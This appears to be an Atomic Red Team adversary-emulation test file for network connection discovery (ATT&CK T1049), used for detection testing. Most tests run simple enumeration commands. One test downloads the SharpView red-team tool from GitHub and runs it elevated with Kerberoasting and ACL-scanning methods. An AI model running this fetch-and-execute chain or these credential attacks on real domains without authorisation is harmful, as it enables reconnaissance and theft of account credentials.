attack_technique: T1049
display_name: System Network Connections Discovery
atomic_tests:
- name: System Network Connections Discovery
  auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
  description: |
    Get a listing of network connections.
    Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      netstat
      net use
      net sessions
    name: command_prompt
- name: System Network Connections Discovery with PowerShell
  auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
  description: |
    Get a listing of network connections.
    Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      Get-NetTCPConnection
    name: powershell
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
  auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
  description: |
    Get a listing of network connections.
    Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
  supported_platforms:
  - linux
  - macos
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if netstat command exists on the machine
    prereq_command: |
      if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Install netstat on the machine."; exit 1;
  executor:
    command: |
      netstat
      who -a
    name: sh
- name: System Discovery using SharpView
  auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
  description: |
    Get a listing of network connections, domains, domain users, etc.
    sharpview.exe, an open-source red-team tool, is located in the bin folder.
    Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
  supported_platforms:
  - windows
  input_arguments:
    SharpView_url:
      description: sharpview download URL
      type: url
      default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true
    SharpView:
      description: Path of the executable open-source red-team tool used for performing this atomic.
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe
    syntax:
      description: Arguments (methods) used along with SharpView to get a listing of network connections, domains, domain users, etc.
      type: string
      default: |
        "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Sharpview.exe must exist on disk at specified location (#{SharpView})
    prereq_command: |
      if (Test-Path "#{SharpView}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{SharpView}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
  executor:
    name: powershell
    elevation_required: true
    command: |
      $syntaxList = #{syntax}
      foreach ($syntax in $syntaxList) {
      #{SharpView} $syntax -}